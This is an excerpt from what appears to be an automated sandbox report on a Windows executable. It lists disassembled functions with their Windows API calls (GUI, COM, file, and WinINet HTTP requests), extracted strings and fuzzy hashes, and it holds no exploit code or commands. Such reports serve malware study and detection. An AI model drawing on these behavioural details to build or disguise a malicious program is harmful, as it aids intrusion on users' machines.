                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00DF49F1
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00DF49FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: 4f46a1cd80174cdc42c7f13f9e73163d955b4cad39013ae2f4bd714a03a39b2f
                                                                                              • Instruction ID: 8c76ca3d5a8ac387b0994f58ee979560ea1d8f46033078a195968c46afe5e115
                                                                                              • Opcode Fuzzy Hash: 4f46a1cd80174cdc42c7f13f9e73163d955b4cad39013ae2f4bd714a03a39b2f
                                                                                              • Instruction Fuzzy Hash: F0316E32100219ABDF119FA4DC08FEB3BAAFF09724F168215FA55E61A0D775D810DB74
                                                                                              Function 00DE458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00DE45B9
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DE45E7
                                                                                              • CoUninitialize.OLE32 ref: 00DE45F1
                                                                                              • _wcslen.LIBCMT ref: 00DE468A
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00DE470E
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DE4832
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DE486B
                                                                                              • CoGetObject.OLE32(?,00000000,00E00B64,?), ref: 00DE488A
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00DE489D
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DE4921
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DE4935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 429561992-0
                                                                                              • Opcode ID: 4c4eaba06fb2ecf3e54bf7c11ff821dfbef922b4301cb5e8da1e7ec2e86b8797
                                                                                              • Instruction ID: 2c213f4a1d5170e3f520c7927bb2b7c9ea66e2a90533b84e5c37796658057323
                                                                                              • Opcode Fuzzy Hash: 4c4eaba06fb2ecf3e54bf7c11ff821dfbef922b4301cb5e8da1e7ec2e86b8797
                                                                                              • Instruction Fuzzy Hash: 3AC133B16043419FC700EF69C88492BBBE9FF89748F14491DF98A9B251DB31ED05CBA2
                                                                                              Function 00DD83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DD844D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DD84E9
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00DD84FD
                                                                                              • CoCreateInstance.OLE32(00E00CD4,00000000,00000001,00E27E8C,?), ref: 00DD8549
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DD85CE
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00DD8626
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00DD86B1
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DD86D4
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00DD86DB
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00DD8730
                                                                                              • CoUninitialize.OLE32 ref: 00DD8736
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2762341140-0
                                                                                              • Opcode ID: 5783514481677cb7d6973a2fb4f6527c4f9678906c409729d16fc9437174cbd7
                                                                                              • Instruction ID: 19239f785a9c459ef218f263c0cafaf95964e81f61950127eb77800d77c2e054
                                                                                              • Opcode Fuzzy Hash: 5783514481677cb7d6973a2fb4f6527c4f9678906c409729d16fc9437174cbd7
                                                                                              • Instruction Fuzzy Hash: A1C11875A00209AFCB14DFA4C884DAEBBF9FF48354B148199E41AEB361CB31ED45DB60
                                                                                              Function 00DC0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DC033F
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00DC0398
                                                                                              • VariantInit.OLEAUT32(?), ref: 00DC03AA
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DC03CA
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00DC041D
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DC0431
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DC0446
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00DC0453
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC045C
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DC046E
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC0479
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 73f2e10b548b515beb06a4230c36c739d488fc34e886b40d1329188162425fa2
                                                                                              • Instruction ID: 1836cd29d2f4fd68e92507cca8bdbccbd94ff3058db51a13d2acb52e067e8c49
                                                                                              • Opcode Fuzzy Hash: 73f2e10b548b515beb06a4230c36c739d488fc34e886b40d1329188162425fa2
                                                                                              • Instruction Fuzzy Hash: E6412C75A00219DFCB14DFA8D844EAEBFBAEF48354F008469E955E7261D730A945CBB0
                                                                                              Function 00DFA8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00DFA926
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00DFA946
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00DFAB83
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DFABA1
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DFABC2
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00DFABE1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DFAC06
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00DFAC29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-3916222277
                                                                                              • Opcode ID: 90330df99a9494eed9133d02c300d67f1653a686c8881a03e7a8999dc5a6c242
                                                                                              • Instruction ID: c2c449aa89bcea8e22461ae4941436d7a7a4decc0af895a9d4ce27113634b662
                                                                                              • Opcode Fuzzy Hash: 90330df99a9494eed9133d02c300d67f1653a686c8881a03e7a8999dc5a6c242
                                                                                              • Instruction Fuzzy Hash: 5FB17B75600219DFDF14CF2DC9857BA7BB2BF44701F0AC069EE899B295D730A944CB61
                                                                                              Function 00DD8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00DD8BB1
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD8BC1
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DD8BCD
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD8C6A
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8C7E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8CB0
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DD8CE6
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8CEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1464919966-438819550
                                                                                              • Opcode ID: e3c7cb24b791120cf1066f683038069397294243e79562d6c40d909fb7db2f1f
                                                                                              • Instruction ID: 42bc1c5c0e747d08d78245def4c7a39432de6eeae4fae57da8893c916ed01d60
                                                                                              • Opcode Fuzzy Hash: e3c7cb24b791120cf1066f683038069397294243e79562d6c40d909fb7db2f1f
                                                                                              • Instruction Fuzzy Hash: 316137B25043059FC710EF64C844AAEB3E9FF89314F04891AE99997251EB35E945CBB2
                                                                                              Function 00DF45A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMenu.USER32 ref: 00DF45D8
                                                                                              • SetMenu.USER32(?,00000000), ref: 00DF45E7
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF466F
                                                                                              • IsMenu.USER32(?), ref: 00DF4683
                                                                                              • CreatePopupMenu.USER32 ref: 00DF468D
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF46BA
                                                                                              • DrawMenuBar.USER32 ref: 00DF46C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 161812096-3044882817
                                                                                              • Opcode ID: 48019585f2c1a952d7cfbb423e9bb00f8470114731fd49acb111d1498af41422
                                                                                              • Instruction ID: bb2d07e02b93990ac5aec1d04d0ab0bc8ca1fa88120d3c770b103e6fc439ff17
                                                                                              • Opcode Fuzzy Hash: 48019585f2c1a952d7cfbb423e9bb00f8470114731fd49acb111d1498af41422
                                                                                              • Instruction Fuzzy Hash: 69414774601309EFDB14CF65D854AEA7BB6FF4A314F198028FA45EB350D730A924CB60
                                                                                              Function 00DC276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DC27F4
                                                                                              • GetDlgCtrlID.USER32 ref: 00DC27FF
                                                                                              • GetParent.USER32 ref: 00DC281B
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC281E
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00DC2827
                                                                                              • GetParent.USER32(?), ref: 00DC283B
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC283E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 711023334-1403004172
                                                                                              • Opcode ID: 78300b49c70293ecc902ba5d6c63a0f9bf6f2536cb78e47c6126bfab951b1a0d
                                                                                              • Instruction ID: a90e929b20cccceaee71754d4c512be8d5defb5bfa1f732801cb9e42d7956cf4
                                                                                              • Opcode Fuzzy Hash: 78300b49c70293ecc902ba5d6c63a0f9bf6f2536cb78e47c6126bfab951b1a0d
                                                                                              • Instruction Fuzzy Hash: 2721B075900219BBCF11EBA0CC95EFEBBB6EF09320B10415AB991E72A1CB748844DB70
                                                                                              Function 00DC2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00DC28D3
                                                                                              • GetDlgCtrlID.USER32 ref: 00DC28DE
                                                                                              • GetParent.USER32 ref: 00DC28FA
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC28FD
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00DC2906
                                                                                              • GetParent.USER32(?), ref: 00DC291A
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DC291D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 711023334-1403004172
                                                                                              • Opcode ID: 5d03c68ca21b0287e4e4f0106b1f90fca46c0465152a16ddf09284c29fe24a68
                                                                                              • Instruction ID: 415b51047a1c5610feb81fa77178b6f76e8a31a58fedf1104b7405345b06a9ff
                                                                                              • Opcode Fuzzy Hash: 5d03c68ca21b0287e4e4f0106b1f90fca46c0465152a16ddf09284c29fe24a68
                                                                                              • Instruction Fuzzy Hash: B521B075900219BBCF11ABA0DC45EFEBBB9EF05310F10801AB991E7295DB748845DB70
                                                                                              Function 00DF4382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DF43FC
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DF43FF
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00DF4426
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DF4449
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DF44C1
                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DF450B
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DF4526
                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DF4541
                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DF4555
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DF4572
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: 5004cc71fc834e138099cdde20bb966e72e13eac942c5bcc555d496bce290b9f
                                                                                              • Instruction ID: f1ed1258627d1b95d501a09fda78de123230863ba3205092354761201c0ce433
                                                                                              • Opcode Fuzzy Hash: 5004cc71fc834e138099cdde20bb966e72e13eac942c5bcc555d496bce290b9f
                                                                                              • Instruction Fuzzy Hash: 06617875900208AFDB11DFA8CC81EFE77B8EB49310F148169FA54AB3A1D770AA45DF60
                                                                                              Function 00DDCBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DDCBCF
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DDCBF7
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DDCC27
                                                                                              • GetLastError.KERNEL32 ref: 00DDCC7F
                                                                                              • SetEvent.KERNEL32(?), ref: 00DDCC93
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00DDCC9E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: e5e8cb9b17bed628a19c16cef3fe3f02bb438706190135a73004623c5d82611a
                                                                                              • Instruction ID: 39d361db702ef434269f8ce3a4b9c0dc87c8ff4c574f7ce25726fbd1a024af9d
                                                                                              • Opcode Fuzzy Hash: e5e8cb9b17bed628a19c16cef3fe3f02bb438706190135a73004623c5d82611a
                                                                                              • Instruction Fuzzy Hash: B8319AB1620305AFDB21AF698D88ABB7BFEEB09744F14551AE54AD6300DB30D904DBB0
                                                                                              Function 00DCA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DA5437,?,?,Bad directive syntax error,00DFDCD0,00000000,00000010,?,?), ref: 00DCA14B
                                                                                              • LoadStringW.USER32(00000000,?,00DA5437,?), ref: 00DCA152
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DCA216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 858772685-4153970271
                                                                                              • Opcode ID: ab6ed27da50199b2414c7a3e7aebc46f1b2a2e428a225404213efd7e9daf5c53
                                                                                              • Instruction ID: a8688a1b4ca318235cc8c8b53ef6781e043687b7df65ad1961595485bef98f35
                                                                                              • Opcode Fuzzy Hash: ab6ed27da50199b2414c7a3e7aebc46f1b2a2e428a225404213efd7e9daf5c53
                                                                                              • Instruction Fuzzy Hash: 3A212E3290031EAFCF11EF94DC46EEE7776FF18318F044459B516A60A2DA719A58DB31
                                                                                              Function 00DC292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00DC293B
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00DC2950
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DC29DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
